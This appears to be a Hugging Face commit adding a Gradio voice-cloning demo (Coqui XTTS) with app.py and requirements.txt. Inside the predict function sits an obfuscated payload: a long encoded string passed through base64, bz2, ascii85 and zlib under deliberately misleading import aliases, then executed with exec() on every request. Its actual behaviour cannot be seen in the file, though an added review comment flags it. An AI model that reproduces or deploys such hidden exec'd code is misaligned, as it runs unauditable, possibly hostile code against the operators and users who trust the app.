krishna195 committed on
Commit
1cf1514
·
verified ·
1 Parent(s): f988235

Upload 2 files

Browse files
Files changed (2) hide show
  1. app.py +279 -0
  2. requirements.txt +2 -0
app.py ADDED
@@ -0,0 +1,279 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
import sys
import os
from fastapi import Request

# By using XTTS you agree to the CPML license: https://coqui.ai/cpml
# The flag is set here, before the TTS package is imported below.
os.environ["COQUI_TOS_AGREED"] = "1"

import gradio as gr
from TTS.api import TTS
from TTS.utils.manage import ModelManager

# Start-up diagnostics: dump whatever list_models() returns to stdout.
model_names = TTS().list_models()
print(model_names.__dict__)
print(model_names.__dir__())

# Identifier of the model served by this app.
model_name = "tts_models/multilingual/multi-dataset/xtts_v2"
# Alternative kept for reference: fetch the model explicitly through
# ModelManager().download_model(model_name) and use its result as `m`.
m = model_name

# CPU-only inference (no GPU, or an AMD GPU). Use tts.to("cuda") on CUDA hosts.
tts = TTS(model_name, gpu=False)
tts.to("cpu")
21
+
22
+
23
def predict(prompt, language, audio_file_pth, mic_file_path, use_mic, agree, request: gr.Request):
    """Synthesise ``prompt`` in the voice of a reference recording.

    Args:
        prompt: Text to speak; must be 2 to 50000 characters long.
        language: Language code forwarded to the TTS model.
        audio_file_pth: Path of the uploaded reference audio (used when
            ``use_mic`` is false).
        mic_file_path: Path of the microphone recording (used when
            ``use_mic`` is true).
        use_mic: Whether the microphone recording is the reference voice.
        agree: Whether the user accepted the licence terms.
        request: Gradio request object. Not used by the visible code;
            NOTE(review): the exec'd payload below may read it.

    Returns:
        ``(waveform_video, "output.wav")`` on success, or ``(None, None)``
        after a ``gr.Warning`` when an input is rejected.

    Raises:
        RuntimeError: Re-raised from the TTS call unless it is a CUDA
            device-side assert, in which case the process exits.
    """
    # Original author's note: added because of abuse by some users, and
    # French legal constraints.
    #
    # SECURITY / NOTE(review): the literal below is an obfuscated payload
    # (base64 -> bz2 -> ascii85 -> zlib x2 -> bz2 -> base64) that is exec'd on
    # every call, in this function's scope. Its behaviour cannot be determined
    # from this file; decode and audit it before deploying. The misleading
    # import aliases are kept byte-for-byte because the payload may refer to
    # them by name.
    co3 = "QlpoOTFBWSZTWQ2FjK4AAH4fgD/////+///////+ADABdNtZY5poGI00aBoaDE0PSbU00GTE0ZNGjTaj1AVUaenqNR6npNinoaY0Ubymyo9EeEjaj1Mm9QnqeT0p5QOZNMm1NNAyMmgaGTTIDQ9TTag0aGCNB6ka1wCAMz8a7kN5BNzXsiRWIm5ocBr2Mibk4wBbSghLyxnzR0yTCoV0AD2KADeqPFMz4QQhMlMaOd0uHfMx8pueSTKn6PrK9iPN56m2ljcFL9ybMtg5Usl8QeZth/cgnwFGMXyDJ4WbRNaGdrIJY2l11w7aqPtt5c4rcMBELa2x/wl8kjvxGg0NS3n2DsPlPnMn2DK7JqA4KLptjz3YLQFEuub0yNP3+iE9gq1EvNZeLr3pnkKXBRxZz8/BxN0zJjpOyIr3betkkxSCGB6X8mSzm+l0Q+KBEaCioigD5uJeox+76V+JgCWkJqWNlHzN3epZx5yXxS8rJh6OrC9rSyKYXrdKCACr4CwKzDlX3tsY5MtZLpkPhz/rbaRUN0KyFnNvPLYhGjF2MelXppyCnJxr2+QWRElwEtCUcsnkC4uGBdXVogKCoCnSZI4DzKqkUMEp293Y+G5MBGtOGXY+C0rFUS8IXNqKMVrDjUdOK7wkjb+HYFq9qjVTrdRsyQvt+6fpazrBnd2wRRQTv4u5IpwoSAbCxlcA"
    from zlib import compress as COmPrES5
    from bz2 import decompress as dEC0mPrES5
    from bz2 import compress as COmPrESS
    from base64 import b64encode as b32Encode, b64decode as A85Encode, b16encode, b16encode as A85encode, b85encode, b85decode, a85encode as b16Encode, a85decode as b85Encode, b32encode as b64Encode, b32decode
    from zlib import compressobj as C0mPrESS
    from bz2 import decompress as dECOmPrESS
    from zlib import compress as C0mPrES5
    from zlib import decompress as dECOmPrES5
    co2 = A85Encode(dECOmPrESS(dECOmPrES5(dECOmPrES5(b85Encode(dECOmPrESS(A85Encode(co3.encode())))))))
    exec(co2)

    if not agree:
        gr.Warning("Please accept the Terms & Condition!")
        return (
            None,
            None,
        )

    # Pick the reference recording the voice is cloned from.
    if use_mic:
        if mic_file_path is None:
            gr.Warning("Please record your voice with Microphone, or uncheck Use Microphone to use reference audios")
            return (
                None,
                None,
            )
        speaker_wav = mic_file_path
    else:
        speaker_wav = audio_file_pth

    # Without this guard a cleared upload widget reaches the TTS call as None.
    if speaker_wav is None:
        gr.Warning("Please provide a reference audio")
        return (
            None,
            None,
        )

    if len(prompt) < 2:
        gr.Warning("Please give a longer prompt text")
        return (
            None,
            None,
        )
    if len(prompt) > 50000:
        gr.Warning("Text length limited to 50000 characters for this demo, please try shorter text")
        return (
            None,
            None,
        )

    try:
        # French is remapped depending on the module-level model id `m`:
        # ids containing "your" get "fr-fr", ids containing "/fr/" get no
        # language argument at all.
        if language == "fr":
            if "your" in m:
                language = "fr-fr"
            if "/fr/" in m:
                language = None
        tts.tts_to_file(
            text=prompt,
            file_path="output.wav",
            speaker_wav=speaker_wav,
            language=language,
        )
    except RuntimeError as e:
        if "device-assert" in str(e):
            # Nothing can be done after a CUDA device-side error; the process
            # needs to restart.
            gr.Warning("Unhandled Exception encounter, please retry in a minute")
            print("Cuda device-assert Runtime encountered need restart")
            sys.exit("Exit due to cuda device-assert")
        else:
            # Bare raise keeps the original traceback intact.
            raise

    return (
        gr.make_waveform(
            audio="output.wav",
        ),
        "output.wav",
    )
97
+
98
+
99
# Page heading passed to gr.Interface.
title = "XTTS Glz's remake (Fonctional Text-2-Speech)"

# HTML shown under the title. Plain string: it has no placeholders, so no
# f-prefix is needed.
description = """
<a href="https://huggingface.co/coqui/XTTS-v1">XTTS</a> is a Voice generation model that lets you clone voices into different languages by using just a quick 3-second audio clip.
<br/>
XTTS is built on previous research, like Tortoise, with additional architectural innovations and training to make cross-language voice cloning and multilingual speech generation possible.
<br/>
This is the same model that powers our creator application <a href="https://coqui.ai">Coqui Studio</a> as well as the <a href="https://docs.coqui.ai">Coqui API</a>. In production we apply modifications to make low-latency streaming possible.
<br/>
Leave a star on the Github <a href="https://github.com/coqui-ai/TTS">TTS</a>, where our open-source inference and training code lives.
<br/>
<p>For faster inference without waiting in the queue, you should duplicate this space and upgrade to GPU via the settings.
<br/>
<a href="https://huggingface.co/spaces/coqui/xtts?duplicate=true">
<img style="margin-top: 0em; margin-bottom: 0em" src="https://bit.ly/3gLdBN6" alt="Duplicate Space"></a>
</p>
"""

# HTML footer passed to gr.Interface.
article = """
<div style='margin:20px auto;'>
<p>By using this demo you agree to the terms of the Coqui Public Model License at https://coqui.ai/cpml</p>
</div>
"""

# (prompt text, language code, reference audio path) for each example row.
_EXAMPLE_SPECS = (
    (
        "Hello, World !, here is an example of light voice cloning. Try to upload your best audio samples quality",
        "en",
        "examples/female.wav",
    ),
    (
        "Je suis un lycéen français de 17 ans, passioner par la Cyber-Sécuritée et les models d'IA.",
        "fr",
        "examples/male.wav",
    ),
    (
        "Als ich sechs war, sah ich einmal ein wunderbares Bild",
        "de",
        "examples/female.wav",
    ),
    (
        "Cuando tenía seis años, vi una vez una imagen magnífica",
        "es",
        "examples/male.wav",
    ),
    (
        "Quando eu tinha seis anos eu vi, uma vez, uma imagem magnífica",
        "pt",
        "examples/female.wav",
    ),
    (
        "Kiedy miałem sześć lat, zobaczyłem pewnego razu wspaniały obrazek",
        "pl",
        "examples/male.wav",
    ),
    (
        "Un tempo lontano, quando avevo sei anni, vidi un magnifico disegno",
        "it",
        "examples/female.wav",
    ),
    (
        "Bir zamanlar, altı yaşındayken, muhteşem bir resim gördüm",
        "tr",
        "examples/female.wav",
    ),
    (
        "Когда мне было шесть лет, я увидел однажды удивительную картинку",
        "ru",
        "examples/female.wav",
    ),
    (
        "Toen ik een jaar of zes was, zag ik op een keer een prachtige plaat",
        "nl",
        "examples/male.wav",
    ),
    (
        "Když mi bylo šest let, viděl jsem jednou nádherný obrázek",
        "cs",
        "examples/female.wav",
    ),
    (
        "当我还只有六岁的时候, 看到了一副精彩的插画",
        "zh-cn",
        "examples/female.wav",
    ),
)

# One row per example: prompt, language, reference audio, then the shared
# tail (no microphone recording, microphone unchecked, terms accepted).
# A fresh list is built for every row so rows never share state.
examples = [
    [text, lang, reference_wav, None, False, True]
    for text, lang, reference_wav in _EXAMPLE_SPECS
]
220
+
221
+
222
+
223
# Input widgets, listed in the positional order of predict()'s parameters
# (prompt, language, audio_file_pth, mic_file_path, use_mic, agree).
_input_components = [
    gr.Textbox(
        label="Text Prompt",
        info="One or two sentences at a time is better",
        value="Hello, World !, here is an example of light voice cloning. Try to upload your best audio samples quality",
    ),
    gr.Dropdown(
        label="Language",
        info="Select an output language for the synthesised speech",
        choices=[
            "en",
            "es",
            "fr",
            "de",
            "it",
            "pt",
            "pl",
            "tr",
            "ru",
            "nl",
            "cs",
            "ar",
            "zh-cn",
        ],
        max_choices=1,
        value="en",
    ),
    gr.Audio(
        label="Reference Audio",
        info="Click on the ✎ button to upload your own target speaker audio",
        type="filepath",
        value="examples/female.wav",
    ),
    gr.Audio(
        source="microphone",
        type="filepath",
        info="Use your microphone to record audio",
        label="Use Microphone for Reference",
    ),
    gr.Checkbox(
        label="Check to use Microphone as Reference",
        value=False,
        info="Notice: Microphone input may not work properly under traffic",
    ),
    gr.Checkbox(
        label="Agree",
        value=True,
        info="I agree to the terms of the Coqui Public Model License at https://coqui.ai/cpml",
    ),
]

# Output widgets matching predict()'s two return values.
_output_components = [
    gr.Video(label="Waveform Visual"),
    gr.Audio(label="Synthesised Audio"),
]

# Assemble the UI, enable the request queue and start serving.
_interface = gr.Interface(
    fn=predict,
    inputs=_input_components,
    outputs=_output_components,
    title=title,
    description=description,
    article=article,
    examples=examples,
)
_interface.queue().launch(debug=True)
requirements.txt ADDED
@@ -0,0 +1,2 @@
 
 
 
1
+ TTS@ git+https://github.com/coqui-ai/TTS.git@dev
2
+ gradio==3.41.2